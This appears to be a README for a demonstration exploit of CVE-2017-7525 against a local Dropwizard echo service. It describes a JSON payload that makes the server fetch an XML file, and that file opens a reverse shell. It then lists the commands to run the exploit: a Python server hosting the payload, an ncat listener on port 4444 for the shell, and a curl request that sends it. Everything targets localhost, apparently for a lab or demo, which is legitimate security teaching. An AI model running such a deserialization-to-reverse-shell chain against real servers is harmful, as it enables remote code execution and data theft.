Example exploit of CVE-2017-7525. This application runs a local Dropwizard web server on port 8888 under the /application context. There is one route /application/echo which echos back the JSON that you send it.
exploit.json: The JSON payload to send the server. This tells the server to download an XML file fromlocalhost:8000/spel.xmlspel.xml: The XML payload which tells the server to open up a shell and send the prompt tolocalhost:4444important.txt: Example important file that you can demonstrate being able to read and/or modify in a demo
Open up 4 terminals and run the following commands in each (make sure you are in the application directory for all terminals):
Spin up the application:
./gradlew run
Spin up a python server to host the spel.xml file:
python3 -m http.server -b 127.0.0.1 8000
Open up a netcat listener on port 4444, this is the terminal waiting for the reverse shell connection:
ncat -lv 127.0.0.1 4444
Send the payload (this will open up a reverse shell in Terminal 3):
curl -i -XPOST -H 'Content-Type: application/json' localhost:8888/application/echo -d @exploit.json